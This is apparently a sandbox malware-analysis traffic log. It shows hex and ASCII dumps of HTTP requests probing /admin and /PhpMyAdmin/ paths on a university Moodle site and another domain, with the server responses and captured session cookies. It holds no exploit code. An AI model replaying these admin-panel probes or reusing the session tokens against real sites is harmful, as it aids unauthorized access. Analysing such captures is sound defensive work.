                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 63 69 6f 6e 61 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 65 6d 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 45 73 74 61 20 70 c3 a1 67 69 6e 61 20 64 65 62 65 72 c3 ad 61 20 72 65 64 69 72 65 63 63 69 6f 6e 61 72 20 61 75 74 6f 6d c3 a1 74 69 63 61 6d 65 6e 74 65 2e 20 53 69 20 6e 6f 20 6f 63 75 72 72 65 20 6e 61 64 61 2c 20 70 6f 72 20 66 61 76 6f 72 20 75 74 69 6c 69 63 65 20 65 6c 20 65 6e 6c 61 63 65 20 64 65 20 63 6f 6e 74 69 6e 75 61 72 20 71 75 65 20 61 70 61 72 65 63 65 20 6d c3 a1 73 20 61 62 61 6a 6f 2e 3c 62 72 20 2f 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 61 64 6d 69 6e 2f 69 6e 64 65 78 2e 70 68 70 3f 63 61 63 68 65 3d 31 22 3e 43 6f 6e 74 69 6e 75 61 72 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="es-mx" xml:lang="es-mx"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Redireccionar</title></head><body><div style="margin-top: 3em; margin-left:auto; margin-right:auto; text-align:center;">Esta pgina debera redireccionar automticamente. Si no ocurre nada, por favor utilice el enlace de continuar que aparece ms abajo.<br /><a href="http://ucivirtual.uci.edu.mx/admin/index.php?cache=1">Continuar</a></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.160834074 CET244OUTGET /admin/index.php?cache=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: MoodleSession=4lsrugirns1q6gvf0q6tng7mua
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.476466894 CET882INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-mx
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: http://ucivirtual.uci.edu.mx/login/index.php
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.2.7
                                                                                                                                                                                                                                                                                                                                                                X-Accel-Buffering: no
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:23 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 491
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 63 69 6f 6e 61 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 65 6d 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 45 73 74 61 20 70 c3 a1 67 69 6e 61 20 64 65 62 65 72 c3 ad 61 20 72 65 64 69 72 65 63 63 69 6f 6e 61 72 20 61 75 74 6f 6d c3 a1 74 69 63 61 6d 65 6e 74 65 2e 20 53 69 20 6e 6f 20 6f 63 75 72 72 65 20 6e 61 64 61 2c 20 70 6f 72 20 66 61 76 6f 72 20 75 74 69 6c 69 63 65 20 65 6c 20 65 6e 6c 61 63 65 20 64 65 20 63 6f 6e 74 69 6e 75 61 72 20 71 75 65 20 61 70 61 72 65 63 65 20 6d c3 a1 73 20 61 62 61 6a 6f 2e 3c 62 72 20 2f 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 6c 6f 67 69 6e 2f 69 6e 64 65 78 2e 70 68 70 22 3e 43 6f 6e 74 69 6e 75 61 72 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="es-mx" xml:lang="es-mx"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Redireccionar</title></head><body><div style="margin-top: 3em; margin-left:auto; margin-right:auto; text-align:center;">Esta pgina debera redireccionar automticamente. Si no ocurre nada, por favor utilice el enlace de continuar que aparece ms abajo.<br /><a href="http://ucivirtual.uci.edu.mx/login/index.php">Continuar</a></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.476685047 CET236OUTGET /login/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: MoodleSession=4lsrugirns1q6gvf0q6tng7mua
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.923787117 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, pre-check=0, post-check=0, max-age=0, no-transform
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-mx
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.2.7
                                                                                                                                                                                                                                                                                                                                                                Content-Script-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                Content-Style-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=edge
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:23 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 29840
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 55 43 49 20 56 69 72 74 75 61 6c 3a 20 49 6e 67 72 65 73 61 72 20 61 6c 20 73 69 74 69 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 74 68 65 6d 65 2f 69 6d 61 67 65 2e 70 68 70 2f 62 6f 6f 73 74 2f 74 68 65 6d 65 2f 31 36 35 36 36 33 34 30 36 30 2f 66 61 76 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 6f 6f 64 6c 65 2c 20 55 43 49 20 56 69 72 74 75 61 6c 3a 20 49 6e 67 72 65 73 61 72 20 61 6c 20 73 69 74 69 6f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 74 68 65 6d 65 2f 79 75 69 5f 63 6f 6d 62 6f 2e 70 68 70 3f 72 6f 6c 6c 75 70 2f 33 2e 31 37 2e 32 2f 79 75 69 2d 6d 6f 6f 64 6c 65 73 69 6d 70 6c 65 2d 6d 69 6e 2e 63 73 73 22 20 2f 3e 3c 73 63 72 69 70 74 20 69 64 3d 22 66 69 72 73 74 74 68 65 6d 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 2f 2a 2a 20 52 65 71 75 69 72 65 64 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 66 69 78 20 73 74 79 6c 65 20 69 6e 63 6c 75 73 69 6f 6e 20 70 72 6f 62 6c 65 6d 73 20 69 6e 20 49 45 20 77 69 74 68 20 59 55 49 20 2a 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 74 68 65 6d 65 2f 73 74 79 6c 65 73 2e 70 68 70 2f 62 6f 6f 73 74 2f 31 36 35 36 36 33 34 30 36 30 5f 31 2f 61 6c 6c 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 4d 20 3d 20 7b 7d 3b 20 4d 2e 79 75 69 20 3d 20 7b 7d 3b 0a 4d 2e 70 61 67 65 6c 6f 61 64 73 74 61 72 74 74 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr" lang="es-mx" xml:lang="es-mx"><head> <title>UCI Virtual: Ingresar al sitio</title> <link rel="shortcut icon" href="http://ucivirtual.uci.edu.mx/theme/image.php/boost/theme/1656634060/favicon" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="keywords" content="moodle, UCI Virtual: Ingresar al sitio" /><link rel="stylesheet" type="text/css" href="http://ucivirtual.uci.edu.mx/theme/yui_combo.php?rollup/3.17.2/yui-moodlesimple-min.css" /><script id="firstthemesheet" type="text/css">/** Required in order to fix style inclusion problems in IE with YUI **/</script><link rel="stylesheet" type="text/css" href="http://ucivirtual.uci.edu.mx/theme/styles.php/boost/1656634060_1/all" /><script type="text/javascript">//<![CDATA[var M = {}; M.yui = {};M.pageloadstartti
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.923870087 CET1286INData Raw: 6d 65 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 0a 4d 2e 63 66 67 20 3d 20 7b 22 77 77 77 72 6f 6f 74 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 22 2c 22 73 65 73 73 6b 65 79 22 3a 22 44 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: me = new Date();M.cfg = {"wwwroot":"http:\/\/ucivirtual.uci.edu.mx","sesskey":"Dcbb3Um8qf","sessiontimeout":"7200","themerev":"1656634060","slasharguments":1,"theme":"boost","iconsystemmodule":"core\/icon_system_fontawesome","jsrev":"16147385
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.923882961 CET1286INData Raw: 5c 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 5c 2f 74 68 65 6d 65 5c 2f 79 75 69 5f 63 6f 6d 62 6f 2e 70 68 70 3f 22 2c 22 63 6f 6d 62 69 6e 65 22 3a 74 72 75 65 2c 22 65 78 74 22 3a 66 61 6c 73 65 2c 22 72 6f 6f 74 22 3a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: \/ucivirtual.uci.edu.mx\/theme\/yui_combo.php?","combine":true,"ext":false,"root":"2in3\/2.9.0\/build\/","patterns":{"yui2-":{"group":"yui2","configFn":yui1ConfigFn}}},"moodle":{"name":"moodle","base":"http:\/\/ucivirtual.uci.edu.mx\/theme\/yu
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.923902988 CET1286INData Raw: 75 67 69 6e 22 2c 22 62 61 73 65 2d 62 75 69 6c 64 22 5d 7d 2c 22 6d 6f 6f 64 6c 65 2d 63 6f 72 65 2d 6d 61 69 6e 74 65 6e 61 6e 63 65 6d 6f 64 65 74 69 6d 65 72 22 3a 7b 22 72 65 71 75 69 72 65 73 22 3a 5b 22 62 61 73 65 22 2c 22 6e 6f 64 65 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ugin","base-build"]},"moodle-core-maintenancemodetimer":{"requires":["base","node"]},"moodle-core-notification":{"requires":["moodle-core-notification-dialogue","moodle-core-notification-alert","moodle-core-notification-confirm","moodle-core-n
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.924021959 CET1286INData Raw: 22 2c 22 61 6e 69 6d 22 5d 7d 2c 22 6d 6f 6f 64 6c 65 2d 62 61 63 6b 75 70 2d 63 6f 6e 66 69 72 6d 63 61 6e 63 65 6c 22 3a 7b 22 72 65 71 75 69 72 65 73 22 3a 5b 22 6e 6f 64 65 22 2c 22 6e 6f 64 65 2d 65 76 65 6e 74 2d 73 69 6d 75 6c 61 74 65 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ","anim"]},"moodle-backup-confirmcancel":{"requires":["node","node-event-simulate","moodle-core-notification-confirm"]},"moodle-course-categoryexpander":{"requires":["node","event-key"]},"moodle-course-dragdrop":{"requires":["base","node","io"
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.924035072 CET1286INData Raw: 7d 2c 22 6d 6f 6f 64 6c 65 2d 71 75 65 73 74 69 6f 6e 2d 70 72 65 76 69 65 77 22 3a 7b 22 72 65 71 75 69 72 65 73 22 3a 5b 22 62 61 73 65 22 2c 22 64 6f 6d 22 2c 22 65 76 65 6e 74 2d 64 65 6c 65 67 61 74 65 22 2c 22 65 76 65 6e 74 2d 6b 65 79 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: },"moodle-question-preview":{"requires":["base","dom","event-delegate","event-key","core_question_user"]},"moodle-question-searchform":{"requires":["base","node"]},"moodle-availability_completion-form":{"requires":["base","node","event","moo
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.924046993 CET1286INData Raw: 64 65 22 2c 22 65 76 65 6e 74 22 5d 7d 2c 22 6d 6f 6f 64 6c 65 2d 6d 6f 64 5f 71 75 69 7a 2d 71 75 65 73 74 69 6f 6e 63 68 6f 6f 73 65 72 22 3a 7b 22 72 65 71 75 69 72 65 73 22 3a 5b 22 6d 6f 6f 64 6c 65 2d 63 6f 72 65 2d 63 68 6f 6f 73 65 72 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: de","event"]},"moodle-mod_quiz-questionchooser":{"requires":["moodle-core-chooserdialogue","moodle-mod_quiz-util","querystring-parse"]},"moodle-mod_quiz-quizbase":{"requires":["base","node"]},"moodle-mod_quiz-toolboxes":{"requires":["base","no
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.924060106 CET1286INData Raw: 22 6d 6f 6f 64 6c 65 2d 63 6f 72 65 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 63 6f 6e 66 69 72 6d 22 2c 22 6d 6f 6f 64 6c 65 2d 65 64 69 74 6f 72 5f 61 74 74 6f 2d 72 61 6e 67 79 22 2c 22 68 61 6e 64 6c 65 62 61 72 73 22 2c 22 74 69 6d 65 72 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: "moodle-core-notification-confirm","moodle-editor_atto-rangy","handlebars","timers","querystring-stringify"]},"moodle-editor_atto-plugin":{"requires":["node","base","escape","event","event-outside","handlebars","event-custom","timers","moodle-
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.924072981 CET1286INData Raw: 65 72 79 73 74 72 69 6e 67 2d 73 74 72 69 6e 67 69 66 79 2d 73 69 6d 70 6c 65 22 2c 22 6d 6f 6f 64 6c 65 2d 63 6f 72 65 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 64 69 61 6c 6f 67 22 2c 22 6d 6f 6f 64 6c 65 2d 63 6f 72 65 2d 6e 6f 74 69 66 69 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: erystring-stringify-simple","moodle-core-notification-dialog","moodle-core-notification-alert","moodle-core-notification-warning","moodle-core-notification-exception","moodle-core-notification-ajaxexception"]},"moodle-atto_accessibilitychecker
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.924086094 CET1286INData Raw: 61 6e 67 65 22 5d 7d 2c 22 6d 6f 6f 64 6c 65 2d 61 74 74 6f 5f 68 74 6d 6c 2d 63 6f 64 65 6d 69 72 72 6f 72 22 3a 7b 22 72 65 71 75 69 72 65 73 22 3a 5b 22 6d 6f 6f 64 6c 65 2d 61 74 74 6f 5f 68 74 6d 6c 2d 63 6f 64 65 6d 69 72 72 6f 72 2d 73 6b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ange"]},"moodle-atto_html-codemirror":{"requires":["moodle-atto_html-codemirror-skin"]},"moodle-atto_image-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_indent-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_i
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.924098015 CET1286INData Raw: 74 6f 72 5f 61 74 74 6f 2d 70 6c 75 67 69 6e 22 2c 22 6d 6f 6f 64 6c 65 2d 65 64 69 74 6f 72 5f 61 74 74 6f 2d 6d 65 6e 75 22 2c 22 65 76 65 6e 74 22 2c 22 65 76 65 6e 74 2d 76 61 6c 75 65 63 68 61 6e 67 65 22 5d 7d 2c 22 6d 6f 6f 64 6c 65 2d 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tor_atto-plugin","moodle-editor_atto-menu","event","event-valuechange"]},"moodle-atto_title-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_underline-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_undo-button":


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                352192.168.2.661886185.51.191.4880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.673520088 CET179OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.896759033 CET540INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Location: http://innovationdevelopment.eu/admin/
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                Expires: Wed, 06 Mar 2024 11:16:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 246
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 65 75 2f 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://innovationdevelopment.eu/admin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                353192.168.2.661912185.51.191.4880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.699532032 CET185OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.000343084 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=49d0abf6993c163efecba1974d36e1b3; expires=Tue, 06-Feb-2024 11:16:06 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:16:06 GMT; Max-Age=86400
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 33 33 36 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 20 43 72 65 61 74 65 64 20 62 79 20 65 78 63 6f 72 65 20 2d 20 53 6e 61 6b 65 20 76 31 2e 38 30 38 20 2d 20 64 6f 62 6f 73 2e 6f 6c 69 76 65 72 40 6e 73 69 6e 66 6f 2e 68 75 20 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 49 6e 6e 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 79 73 74 65 6d 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6c 61 67 73 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6c 65 61 72 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 6e 22 20 2f 3e 